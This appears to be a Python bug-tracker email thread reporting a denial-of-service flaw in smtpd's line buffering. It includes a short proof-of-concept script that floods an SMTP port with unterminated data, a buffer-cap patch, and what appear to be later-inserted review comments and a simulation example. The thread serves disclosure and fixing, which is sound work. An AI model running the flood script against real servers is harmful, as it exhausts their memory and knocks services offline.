Bugs item #1745035, was opened at 2007-06-28 21:44
Message generated for change (Settings changed) made by loewis
You can respond by visiting: 
https://sourceforge.net/tracker/?func=detail&atid=105470&aid=1745035&group_id=5470

Please note that this message will contain a full copy of the comment thread,
including the initial issue submission, for this request,
not just the latest update.
Category: Python Library
Group: None
Status: Open
Resolution: None
>Priority: 7
Private: No
Submitted By: billiejoex (billiejoex)
Assigned to: Nobody/Anonymous (nobody)
Summary: DoS smtpd vulnerability

Initial Comment:
The "collect_incoming_data" method of the "SMTPChannel" class should stop buffering if
received lines are too long (possible Denial-of-Service attack).
Without truncating such a buffer, a simple malicious script sending extremely long
lines without a "\r\n" terminator could easily saturate system resources.

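The failure described in the initial comment, as an added example that is not part of the bug report or of CPython's smtpd module: a socket-free stand-in for the collect_incoming_data()/found_terminator() contract that asynchat drives, fed the same never-terminated stream the malicious script sends. The names LineCollector, MAX_LINE_LEN, CHUNK, feed() and simulate_*() are this example's own, the 4096 cap mirrors the value in the proposed patch, and the inputs are constructed here.

```python
# Added example, not code from the bug report or from CPython's smtpd: a
# socket-free stand-in for asynchat's collect_incoming_data()/found_terminator()
# contract, showing why an unbounded line buffer is a DoS and one way to bound
# it.  LineCollector, MAX_LINE_LEN, CHUNK and feed() are this example's own
# names; the 4096 cap mirrors the value used in the proposed patch.
MAX_LINE_LEN = 4096   # hypothetical cap on bytes buffered for one line
CHUNK = 1024          # bytes handed to collect_incoming_data() per simulated read


class LineCollector(object):
    """Assembles terminator-delimited lines the way smtpd.SMTPChannel does."""

    def __init__(self, max_line_len=None):
        self.max_line_len = max_line_len   # None reproduces the unbounded original
        self._line = []                    # pending chunks of the current line
        self._in_buffer_len = 0            # bytes currently held in self._line
        self.lines = []                    # completed lines, as found_terminator sees them
        self.replies = []                  # what the server would push back
        self.closed = False

    def collect_incoming_data(self, data):
        if self.closed:
            return
        if self.max_line_len is not None:
            self._in_buffer_len += len(data)
            if self._in_buffer_len > self.max_line_len:
                # Reject loudly rather than silently dropping the partial line:
                # the client learns why, and nothing more is buffered for this peer.
                self._line = []
                self._in_buffer_len = 0
                self.replies.append(b'500 Error: line too long')
                self.closed = True
                return
        self._line.append(data)

    def found_terminator(self):
        if self.closed:
            return
        line = b''.join(self._line)
        self._line = []
        self._in_buffer_len = 0            # the reset the first patch forgot
        self.lines.append(line)

    def buffered_bytes(self):
        return sum(len(d) for d in self._line)


def feed(collector, stream):
    """Drive a collector as asynchat would: bytes before each CRLF go to
    collect_incoming_data() in CHUNK-sized reads, the CRLF itself triggers
    found_terminator().  A simplification of asynchat's real read loop."""
    while stream:
        idx = stream.find(b'\r\n')
        if idx < 0:
            body, stream = stream, b''
        else:
            body, stream = stream[:idx], stream[idx + 2:]
        for i in range(0, len(body), CHUNK):
            collector.collect_incoming_data(body[i:i + CHUNK])
        if idx >= 0:
            collector.found_terminator()
    return collector


def simulate_attack(max_line_len, attacker_bytes):
    """Constructed input: the PoC's stream of 'x' bytes with no terminator.
    Returns (bytes still buffered, replies sent, connection closed)."""
    c = feed(LineCollector(max_line_len), b'x' * attacker_bytes)
    return c.buffered_bytes(), c.replies, c.closed


def simulate_session(max_line_len, stream):
    """Constructed legitimate traffic; returns the lines the server accepted."""
    return feed(LineCollector(max_line_len), stream).lines


if __name__ == '__main__':
    print('unbounded:', simulate_attack(None, 1 << 20))
    print('bounded:  ', simulate_attack(MAX_LINE_LEN, 1 << 20))
    print('session:  ', simulate_session(MAX_LINE_LEN, b'EHLO example.org\r\nQUIT\r\n'))
```

With max_line_len=None the buffer grows by exactly as many bytes as the attacker sends, which is the reported bug; with the cap, memory stays at most one read above the cap, the peer gets a 500 reply and no further input is buffered. The counter is reset in found_terminator() as well as on rejection, so a line that is long but within the limit (4096 bytes here) is still accepted intact.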
----------------------------------------------------------------------

Comment By: billiejoex (billiejoex)
Date: 2007-06-29 20:00

Message:
Logged In: YES 
user_id=1357589
Originator: YES

Sorry, I realized I'd forgotten to reset the byte counter to zero.
Here's the patch of the patch:

124a125
>         self.__in_buffer_len = 0
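Review bot: the 4096 limit applied to this counter in the next hunk is a bare magic number; declare the cap beside the counter as a documented class attribute (for example `max_line_length = 4096` on SMTPChannel, the name is a suggestion) so it appears in the module docs and subclasses can override it, and say in a comment why 4096 was chosen (RFC 2821 caps command lines at 512 and text lines at 1000 octets including CRLF, so this is already generous).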
135a137,140
>         self.__in_buffer_len += len(data)
>         if self.__in_buffer_len > 4096:
>             self.__line = []
>             self.__in_buffer_len = 0
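Review bot: clearing self.__line and carrying on is a silent truncation, not a rejection: the chunk that crossed 4096 is dropped, but the bytes that follow it up to the next "\r\n" are buffered again and handed to found_terminator as if they were a complete line, so an over-long but legitimate line arrives corrupted and the sender is never told. Reply with an error and shed the connection instead, e.g. `self.push('500 Error: line too long')` followed by `self.close_when_done()`; that also stops an attacker from holding the connection open indefinitely while refilling the buffer over and over. Resetting the counter here is correct.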
141a147
>         self.__in_buffer_len = 0


----------------------------------------------------------------------

Comment By: billiejoex (billiejoex)
Date: 2007-06-28 21:45

Message:
Logged In: YES 
user_id=1357589
Originator: YES

--- malicious script

import socket

# Proof of concept: connect to a local smtpd.SMTPChannel (port 8025) and
# stream data that never contains the "\r\n" terminator, so
# collect_incoming_data() keeps appending to its line buffer without bound.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8025))
while 1:
    s.sendall(b'x' * 1024)   # bytes literal so it runs on Python 2.6+ and 3


--- proposed smtpd.py patch

124a125
>         self.__in_buffer_len = 0
135a137,139
>         self.__in_buffer_len += len(data)
>         if self.__in_buffer_len > 4096:
>             self.__line = []
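Review bot: once self.__in_buffer_len exceeds 4096 it is never reset, neither here nor in found_terminator, so from that point every chunk on the connection, legitimate or not, is discarded until the peer disconnects; reset the counter to 0 alongside `self.__line = []` in both places.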



----------------------------------------------------------------------

_______________________________________________
Python-bugs-list mailing list 